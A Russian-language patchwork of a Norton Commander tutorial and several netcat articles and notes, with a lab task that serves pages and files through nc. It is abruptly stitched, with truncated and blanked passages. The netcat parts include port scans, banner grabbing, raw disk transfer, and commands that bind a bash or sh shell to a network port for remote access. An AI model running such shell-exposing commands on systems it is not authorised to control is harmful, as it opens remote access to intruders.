Основные команды NC вызываются функциональными клавишами F1 - F10. Список этих команд расположен в нижней информационной строке экрана.

а) Подсказка, помощь, Help, F1 (рис.2, 3).

При нажатии этой клавиши на экране появляются: краткое описание системы Norton Commander и подсказка, описывающая назначение клавиш и команд.

б) меню пользователя, Menu, F2 (рис.4)

С помощью этой команды на экран вызывается дополнительное меню, созданное пользователем.

в) просмотр содержимого файла, View, F3 (рис.5).

Курсор надо поставить на имя файла, содержание которого требуется просмотреть и нажать клавишу F3. На экране монитора высветится содержание файла, которое можно увидеть, прочитать, но невозможно производить редактирование.

г) Редактирование текста, Edit, F4 (рис.6)

Чтобы загрузить файл во встроенный редактор Norton Commander, нужно указать этот файл курсором и нажать клавишу F4. В целях редактирования перемещение курсора можно осуществлять клавишами управления курсором. Встроенный редактор Norton Commander может работать с файлом объем которого не превышает 30 Кбайт. Для файлов с большим объемом используется внешний редактор, если он настроен в системе Norton Commander. Для загрузки файла во внешний редактор используют команду, вызываемую нажатием ALT + F4.

д) Копирование файлов и каталогов, Copy, F5 (рис.7, 8, 9)

Для копирования файла необходимо определить каталог, где он находится (источник) и куда будет копироваться (приемник). В пассивной панели нужно открыть каталог-приемник, а в активной панели-каталог-источник. В последнем нужно курсором указать копируемый файл и нажать F5. В появившемся диалоговом окне, после нажатия F5, нужно подтвердить копирование. При необходимости здесь можно исправить имя каталога-приемника или дать другое имя для файла копии.

При копировании группы файлов сначала их нужно отметить, для чего курсор подводится к имени нужного файла и нажимается клавиша Insert. При этом имя отмеченного файла изменит цвет и фон. Для снятия отметки с файла, на котором находится курсор, достаточно еще раз нажать клавишу Insert. Копирование производится нажатием клавиши F5. В появившемся диалоговом окне нужно подтвердить копирование как одиночного файла, так и группы (всех) файлов.

Если нужно скопировать все файлы каталога, то для выделения их достаточно нажать клавишу с знаком * малой цифровой клавиатуры. Для отмены выделения нужно повторно нажать эту клавишу.

Если нужно скопировать все файлы определенной группы, то для выделения их достаточно нажать клавишу с одинарным знаком + малой цифровой клавиатуры и в появившемся диалоговом окна выбрать признак группы и нажать Enter. И наоборот, для отмены выделения нужно нажать клавишу с одинарным знаком минус (-) и нажать клавишу Enter.

Для инверсного выделения нужно нажать клавишу с знаком * малой цифровой клавиатуры.

Признаки групп, указываемые при копировании, достаточно множественны. Некотрорые примеры показаны в таблице 1. Таблица 1

Здравствуй Уважаемый читатель Х!

Думаю, этот рисунок можно назвать мини-тестом "Хакер ли ты?". Попробуй сказать, что
означает этот забавный котенок. Ну а если затруднения все-таки возникают, знай, что перед тобой самый любимая вещь всех продвинутых людей, так или иначе
связанных с Сетью, и имя ей - Netcat.

Netcat - это утилита, которая позволяет читать и передавать данные через сетевые
соединения. Иными словами, Netcat позволяет тебе соединятся с чем угодно и делать что угодно. Netcat абсолютно самодостаточен, при грамотном использовании он может заменить любое программное средство, включая даже известный тебе
Apache. Итак, в самом простом варианте Netcat позволяет создавать TCP и UDP соединения с любого на любой порт, умеет "слушать" входящие соединения (причем можно приказать "котенку" ждать соединения только с указанных тобой адресов и даже портов!), может сканировать порты, разрешать DNS-запросы, посылать любые команды со стандартного ввода, выполнять заранее предопределенные действия, в ответ на соединение, которое слушает "котенок", делать Hex-дамп отправленных и полученных данных и много-много чего еще...

Хотя, думаю нужно было с самого начала сказать, что Netcat умеет все; и возможности его использования ограниченны лишь уровнем твоих знаний и твоей фантазией. Изначально, Netcat задумывался как Unix утилита, но как ты понимаешь не могло не найтись энтузиастов, которые бы не портировали "котенка" под Windows. Обе версии ты без труда найдешь в поисковиках по запросу "Netcat". Но преимущества, конечно, достаются Unix-оидам, которые при компиляции могут слегка подправить "котенка" и тем самым активировать отключенные по дефолту фишки "дополнительные возможности".

Если ты когда-либо пользовался "программно-реализованными атаками", а попросту говоря эксплоитами, то наверняка замечал, что более, чем в половине из них так или иначе используется Netcat. Это связано прежде всего с тем, что Netcat никогда и никоим образом не модифицирует входящие данные (равно как и исходящие), в отличие скажем от Telnet-клиента, который сначала интерпретирует входящие данные, а уж затем выдает их тебе. Именно поэтому Netcat превратился в мощный инструмент поиска и эксплуатации уязвимостей, благодаря которому Bugtraq пополнился сотнями новых постингов.

Но, если поиск уязвимостей тебе не по душе, можешь попробовать использовать Netcat в качестве web-браузера, или, скажем, почтового клиента; тем паче, что в Internet Explorer-е и Outlook-е нашли "свежие" дыры, старый добрый Уникод, хех... Причем, на этом поприще отличились наши русские парни (!Играет национальная гордость!). Если ты читаешь эту статью, используя Explorer, сходи, посмотри насколько твой "Осел"
дыряв .

Вот после такого и пересядешь на Netcat - не очень удобно, зато
безопасно... Ну и наконец, примеры "продвинутого" использования Netcat
(Unix):

1. Netcat как ;
2. Netcat как утилита " "; такие часто описываются в X, а ведь в действительности они просто отправляют запросы на хорошо известные тебе поисковики... Твой "котенок" тоже может делать эту полезную работу!;
3. Netcat как ! Заставь провайдера отдохнуть!!!

Обрати внимание, все выполнено в виде shell-скриптов так что ты при необходимости сможешь подправить все, что угодно.
За сим хочу проститься. Читай мануалы, и удачи тебе в изучении в изучении культовой утилиты Netcat!

P.S./Личное/: Сайт http://georgy.h1.ru/ мною закрыт. Раз и навсегда. Спасибо всем, кто был моим гостем.

В данной статье я рассмотрю популярную сетевую утилиту netcat и полезные трюки при работе с ней.

Netcat - утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их. Несмотря на свою полезность и простоту, многие не знают способы ее применения и незаслуженно обходят ее стороной.

С помощью данной утилиты можно производить некоторые этапы при проведении тестирования на проникновение. Это может быть полезно, когда на атакованной машине отсутствуют (или привлекут внимание) установленные пакеты, есть ограничения (например IoT/Embedded устройства) и т.д.

Что можно сделать с помощью netcat:

• Сканировать порты;
• Перенаправлять порты;
• Производить сбор баннеров сервисов;
• Слушать порт (биндить для обратного соединения);
• Скачивать и закачивать файлы;
• Выводить содержимое raw HTTP;
• Создать мини-чат.

Вообще с помощью netcat можно заменить часть unix утилит, поэтому этот инструмент можно считать неким комбайном для выполнения тех или иных задач.

Практические примеры

Во многих случаях при необходимости проверки того или иного хоста используют телнет, либо собственные сервисные службы для выявления хоста или баннера. Как нам может помочь netcat:

Проверка наличия открытого TCP-порта 12345

$ nc -vn 192.168.1.100 12345

nc: connect to 192.168.1.100 12345 (tcp) failed: Connection refused

$ nc -v 192.168.1.100 22

Connection to 192.168.1.100 22 port succeeded!
SSH-2.0-OpenSSH

Сканирование TCP-портов с помощью netcat:

$ nc -vnz 192.168.1.100 20-24

При таком сканировании не будет соединение с портом, а только вывод успешного соединения:

nc: connectx to 192.168.1.100 port 20 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 21 (tcp) failed: Connection refused
found 0 associations
found 1 connections:
1: flags=82
outif en0
src 192.168.1.100 port 50168
dst 192.168.1.100 port 22
rank info not available
TCP aux info available
Connection to 192.168.1.100 port 22 succeeded!
nc: connectx to 192.168.1.100 port 23 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 24 (tcp) failed: Connection refused

Сканирование UDP-портов.

Для сканирования UDP портов с помощью nmap необходимы root привилегии. Если их нет - в этом случае нам тоже может помочь утилита netcat:

$ nc -vnzu 192.168.1.100 5550-5560

Connection to 192.168.1.100 port 5555 succeeded!

Отправка UDP-пакета

$ echo -n "foo" | nc -u -w1 192.168.1.100 161

Это может быть полезно при взаимодействии с сетевыми устройствами.

Прием данных на UDP-порту и вывод принятых данных

$ nc -u localhost 7777

После первого сообщения вывод будет остановлен. Если необходимо принять несколько сообщений, то необходимо использовать while true:

$ while true; do nc -u localhost 7777; done

Передача файлов. С помощью netcat можно как получать файлы, так и передавать на удаленный хост:

nc 192.168.1.100 5555 < 1.txt
nc -lvp 5555 > /tmp/1.txt

Netcact в роли простейшего веб-сервера.

Netcat может выполнять роль простейшего веб-сервера для отображения html странички.

$ while true; do nc -lp 8888 < index.html; done

C помощью браузера по адресу: http://хост netcat:8888/index.html. Для использования стандартного порта веб-сервера под номером 80 вам придется запустить nc c root привелегиями:

$ while true; do sudo nc -lp 80 < test.html; done

Чат между узлами

На первом узле (192.168.1.100):

$ nc -lp 9000

На втором узле:

$ nc 192.168.1.100 9000

После выполнения команд все символы, введенные в окно терминала на любом из узлов появятся в окне терминала другого узла.

Реверс-шелл

С помощью netcat можно организовать удобный реверс-шелл:

nc -e /bin/bash -lp 4444

Теперь можно соединиться с удаленного узла:

$ nc 192.168.1.100 4444

Не стоит опускать руки, если нет тех или иных инструментов, зачастую довольно громоздких, иногда задачу можно решить подручными средствами.

Инструкция по работе в Norton Commander

Для запуска системы NC в командной строке DOS набрать команду NC либо щелкнуть левой кнопкой мышки по пиктограмме NC на рабочем столе компьютера. Для завершения работы с NC нажать клавишу [ F 10] . В появившемся диалоговом окне выбрать ответ “Да” в случае выхода из системы, “Нет” – в противном случае. Выбор варианта ответа выполняется клавишами управления курсором на функциональной клавиатуре и последующим нажатием клавиши [ Enter ] . В нижней части экрана содержится командная строка DOS, где можно вводить соответствующие команды, работая под управлением NC. Самая нижняя строка экрана содержит строку подсказки, где указывается назначение основных “горячих” клавиш, которые соответствуют командам NC (и DOS).

После запуска NC на экране появляются две панели – левая и правая. В верхней части каждой из панелей в маленьком прямоугольном окне указано полный путь к текущему файлу или каталогу. Та панель, в которой находится подсвеченный прямоугольник – курсор, называется активной. Для перехода с панели на панель используется клавиша . Если выделена верхняя строка на панели и изображением “…” это означает, что Вы находитесь в каталоге с именем, указанным в верхней части панели. Для работы с панелями используются следующие команды:

[ Ctrl ] + [ F 1] Убрать/ показать левую панель

[ Ctrl ] + [ F 2] Убрать/ показать правую панель

[ Ctrl ] + [ U ] Поменять панели местами

[ Ctrl ] + [ O ] Убрать/ показать обе панели

[ Ctrl ] + [ P ] Убрать/ показать не активную панель

Для смены логического имени диска на левой панели нажать [ Alt ] + [ F 1] , в появившемся диалоговом окне выбрать с помощью клавиш управления курсором нужное имя диска из предлагаемых имен, нажать клавишу [ Enter ] . Для правой панели действия аналогичны, но в начале следует нажать [ Alt ] + [ F 2] .

Для перехода в каталог выделить его на активной панели и нажать клавишу [ Enter ] . Для перехода в каталог более высокого уровня на активной панели выделить строку “…” и нажать клавишу [ Enter ] .

Для работы с каталогами используются следующие команды:

[ F 7] – создать каталог . В появившемся диалоговом окне задать новое имя каталога;

[ F 8] – удалить каталог . В появившемся диалоговом окне подтвердить удаление или отменить удаление нажатием клавиши Esc.

Для работы с файлами используются следующие команды:

[ Shift ] + [ F 4] – создать файл . В появившемся диалоговом окне задать новое имя файла (при этом не забывать указывать расширение). После того как имя файла задано, в рабочем пространстве экрана набрать содержимое файла. Завершить создание файла командой [ Ctrl ] + [ Z ]. Для сохранения файла нажать клавишу [ F 2] . Выйти из режима редактирования клавишей [ F 10 ] .

[ F 4] – редактирование ранее созданного документа . При этом в диалоговом окне необходимо задать имя редактируемого файла. При работе в режиме редактирования в пространстве экрана в нижней части появляется строка подсказки с назначением “горячих” клавиш в режиме редактирования.

[ Shift ] + [ F 2] – сохранить файл с новым именем.

[ F 3] – просмотреть содержимое файла . Для этого предварительно выделить файл на панели.

[ F 5] – копирование файла . Все операции с файлами и каталогами выполняются с использованием обеих панелей. Для копирования файла на неактивной панели установить каталог, куда будет помещен копируемый файл, перейти в данный каталог. На активной панели выделить копируемый файл и нажать клавишу [ F 5] . Для подтверждения копирования нажать клавишу [ Enter ] , для отмены – .

[ F 6] – перенос/переименование файла . Операция выполняется аналогично копированию. Для перемещения файла на неактивной панели установить каталог, куда будет помещен файл, перейти в данный каталог. На активной панели выделить перемещаемый файл и нажать клавишу [ F 6] . Для переименования файла в диалоговом окне задать новое имя файла, добавив его через значок ” \ ” в указании пути. При этом необходимо помнить, что перемещаемый файл с прежнего места удаляется.

[ F 9] – переход в меню NC .

Групповые операции над файлами

Операции копирования, перемещения, удаления можно выполнять над несколькими файлами одновременно. Для этого их необходимо пометить, выделив на панели и нажав клавишу [ Insert ] . При этом выделенные файлы подсвечиваются прямоугольниками контрастного цвета. Для снятия выделения указанные действия повторить. После процедуры выделения файлов требуемая операция (копирования, перемещения, удаления) выполняется над группой файлов как над одним. Второй способ выделения файла выполняется при нажатии большой серой клавиши ”+” на функциональной клавиатуре слева. После нажатия этой клавиши в диалоговом окне следует задать имя файла или указать имена файлов при использовании маски в имени: “ * ”, “ *.* ”, “ ? ”. Для снятия выделения файлов использовать клавишу ” - ” на функциональной клавиатуре слева.

Система Меню NC

Система меню предназначена для настройки оболочки и облегчения выполнения операций. Вызов строки меню осуществляется при нажатии клавиши [ F 9] . Система меню состоит из строки меню и выпадающих меню. Меню содержит следующие пункты: Правая Файлы Команды Настройки Левая . Команды Правая и Левая определяют выбор режима отображения файлов на панели. Все опции команд для левой и правой панели идентичны. Команда Файлы предназначена для выполнения операций над файлами и каталогами. Пункт меню Команды предназначен для выполнения дополнительных команд. Команда Настройки предназначена для настройки среды NC. Выбор соответствующей команды выполняется с помощью клавиш управления курсором и последующим нажатием клавиши [ Enter ].

Пункт меню Левая (Правая).

Выпадающее меню данной команды содержит опции выбора формата отображения файла на экране. В режиме Краткий на панели выводятся только имена файлов и каталогов. В режиме Полный выводятся имя файла или каталога, для файла указывается его размер, для каталога – строка “подкаталог“, дата и время создания файла и каталога. В режиме Дерево можно отобразить дерево каталогов текущего диска и с помощью курсора быстро отыскать требуемый файл, перемещаясь по дереву. Следующая группа опций данного пункта меню определяет порядок отображения файлов на панели. При этом файлы могут располагаться в произвольном порядке – режим Без сортировки , а могут быть упорядочены в определенном порядке: Имя – по имени в алфавитном порядке, Расширение – по расширению в алфавитном порядке, Время – по дате создания, причем файлы с последними датами создания располагаются в начале списка, Размер – по размеру файла в порядке убывания. Выбор строки соответствующего режима осуществляется курсором и установки флажка с помощью клавиши “пробел”.

Пункт меню Файлы .

Выпадающее меню данной команды содержит описание назначения горячих клавиш [ F 1] - [ F 8] , т.е. действия горячих клавиш продублированы командами меню. Следующая опция – Установка атрибутов. Атрибуты устанавливаются только для файлов. Порядок установки атрибутов таков: на панели курсором выбирается файл. После этого нажав клавишу [ F 9] перейти в меню NC и выбрать пункт Файлы Установка атрибутов . После нажатия клавиши [ Enter ] в диалоговом окне появляется список возможных атрибутов: Только для чтения, Архивные, Скрытые, Системные . Выбор строки атрибута файла выполняется курсором и установки флажка с помощью клавиши “пробел”. При этом файл с атрибутами Только для чтения невозможно модифицировать, он доступен только для просмотра. Файл с атрибутами Скрытый на панели помечается маленьким подсвеченным прямоугольничком (если в настройках экрана не установлена опция Показать скрытые файлы имя файла вообще на панели не отображается). Следующая группа команд позволяет выделять файлы (аналог большой серой клавиши ”+” ), снимать выделение (аналог клавиши ” - ” на функциональной клавиатуре), инвертировать выделение (аналог клавиши ” * ” на функциональной клавиатуре).

Пункт меню Команды .

Выпадающее меню данной команды позволяет создать меню пользователя, отредактировать данное меню, просмотреть историю команд, вводимых в командной строке DOS, и содержит другие дополнительные возможности оболочки NC.

Пункт меню Настройки.

Выпадающее меню данной команды позволяет настроить интерфейсную среду удобным для пользователя образом. Содержит опцию Настройки Редактор и другие. При выборе строки меню Настройки раскрывается набор диалоговых окон, позволяющих выбрать цветовой набор экрана, задать количество строк на экране и т.д. Диалоговое окно Настройки панели позволяет Показать скрытые файлы , если установлен соответствующий флажок (или не показывать). Установка флажков соответствующих опций выполняется также курсором и клавишей “пробел”.

Задание к лабораторной работе

Отображение тестовой HTML-странички клиенту с обычным браузером одной командой (порт 8080):
(echo -e "HTTP/1.1 200 OK\nContent-Type: text/html\n\n Hello World";) | nc -vv -l -p 8080
Передача файла клиенту с обычным браузером одной командой (порт 8080):
(echo -e "HTTP/1.1 200\nContent-Disposition: attachment; filename=целевое-имя-которое-увидит-клиент\nContent-Type: application/octet-stream\nConnection: close\n"; cat имя-файла-на-диске) | nc -vv -l -p 8080

Как пользоваться nc?

(http://handynotes.ru/2010/01/unix-utility-netcat.html )

Начнем с нескольких простых примеров и далее будем их использовать как базовые.
Если Вы помните, я говорил, что netcat это Швейцарский армейский нож. Чем-бы этот нож был, если бы его нельзя было использовать как обычный нож? Вот почему netcat может использоваться вместо обычного telnet:

$ nc www.google.com 80

В действительности он более удобный чем обычный telnet, потому что Вы можете завершить соединение в любое время, нажав Ctrl+C и он обрабатывает двоичные данные как обычные (никаких escape последовательностей, ничего).
Вы можете добавить параметр “-v” для более подробного вывода результатов действий, и параметр (-vv) для получения статистики о том, сколько байт было передано во время текущего сеанса соединения.
Netcat может быть использован в качестве сервера. Если Вы запустите его, как указано ниже, он будет слушать на порту 12345 (на всех интерфейсах):

$ nc -l -p 12345

Теперь если Вы подключитесь к порту 12345 этого хоста, все, что Вы набираете будет передано удаленной стороне, что говорит нам о том, что netcat можно использовать как чат сервер. Запустите на одном из компьютеров:

# На компьютере A с IP 10.10.10.10
$ nc -l -p 12345

И подключитесь к нему с другого:

# На компьютере B
$ nc 10.10.10.10 12345

Теперь обе стороны могут переговариваться!
Такой способ разговора, когда обе стороны могут разговаривать друг с другом делает возможным использование nc для операций ввода/вывода через сеть! К примеру, Вы можете послать целую директорию с одного компьютера на другой организовав tar конвейер через nc на первом компьютере, и перенаправив вывод в другой tar процесс на втором.
Предположим, Вы хотите переслать файлы из директории /data компьютера A с IP 192.168.1.10 на компьютер B (с любым IP). Это просто:

$ tar -cf — /data | nc -l -p 6666

# На компьютере B
$ nc 192.168.1.10 6666 | tar -xf -

Не забудьте скомбинировать конвейер с Рipe Viewer , который был описан в предыдущей статье, что-бы посмотреть статистику того, как быстро происходит передача!
Одиночный файл может быть послан проще:

# На компьютере A с IP 192.168.1.10
$ cat file | nc -l -p 6666

# На компьютере B
$ nc 192.168.1.10 6666 > file

Вы даже можете скопировать и восстановить целый диск, с помощью nc:

# На компьютере A с IP 192.168.1.10
$ cat /dev/hdb | nc -l -p 6666

# На компьютере B
$ nc 192.168.1.10 6666 > /dev/hdb

Заметим: Опция “-l” не может быть использована совместно с “-p” на Mac компьютерах! Решение, — просто заменить “-l -p 6666? на “-l 6666?. Как здесь:

# теперь nc слушает на порту 6666 для Mac компьютеров
$ nc -l 6666

Незаурядное использование netcat — сканирование портов. Netcat не лучший инструмент для такой работы, но он с этим справляется (лучший, конечно-же nmap):

$ nc -v -n -z -w 1 192.168.1.2 1-1000
(UNKNOWN) 445 (microsoft-ds) open
(UNKNOWN) 139 (netbios-ssn) open
(UNKNOWN) 111 (sunrpc) open
(UNKNOWN) 80 (www) open
(UNKNOWN) 25 (smtp) : Connection timed out
(UNKNOWN) 22 (ssh) open

Параметр “-n” предотвращает от просмотра DNS, “-z” не ждет ответа от сервера, и “-w 1? задает таймаут для соединения в 1 секунду.
Другое нетривиальное использование netcat в роли прокси. И порт и хост могут быть перенаправлены. Посмотрите на этот пример:

$ nc -l -p 12345 | nc www.google.com 80

Эта команда запускает nc на порту 1234 и перенаправляет все соединения на google.com:80. Если теперь Вы подключитесь к этому компьютеру на порту 12345 и сделаете запрос, Вы обнаружите, что в ответ не получаете никаких данных. Это правильно, потому-что мы не установили двунаправленный канал. Если Вы добавите второй канал, Вы получите Ваши данные на другом порту:

$ nc -l -p 12345 | nc www.google.com 80 | nc -l -p 12346

После посылки запроса на порт 12345, получите Ваши данные ответа на порту 12346.
Вероятно самая мощная возможность netcat — запустить любой процесс как сервер:

$ nc -l -p 12345 -e /bin/bash

Параметр “-e” пораждает выполнение ввода и вывода перенаправляемого через сетевой сокет. Теперь, если Вы подключитесь к хосту на порту 12345, Вы можете использовать bash:
$ nc localhost 12345
ls -las
total 4288
4 drwxr-xr-x 15 pkrumins users 4096 2009-02-17 07:47 .
4 drwxr-xr-x 4 pkrumins users 4096 2009-01-18 21:22 ..
8 -rw——- 1 pkrumins users 8192 2009-02-16 19:30 .bash_history
4 -rw-r—r— 1 pkrumins users 220 2009-01-18 21:04 .bash_logout

(http://execbit.ru/2011/05/23/netcat/)
1 Передавать файлы (первую команду выполняем на принимающей машине, вторую - на передающей:

$ nc -l 31334 > filename $ nc 172.16.69.143 31334 < filename

$ nc -f /var/log/messages | nc -l 31334 $ nc 172.16.69.143 31334

3 Использовать вместо telnet (первая - telnet-сервер, вторая - клиент):

$ nc -l -p 31334 -e /bin/sh $ nc 172.16.69.143 31334

4 Сканировать на открытые порты:

$ nc -z execbit.ru 1-1024

5 Осуществлять фингерпринт сервисов на основе баннеров:

$ echo "QUIT" | nc execbit.ru 1-1024

6 Организовывать обратный шелл (первая - клиент, вторая - сервер, однако шелл откроется от сервера к клиенту).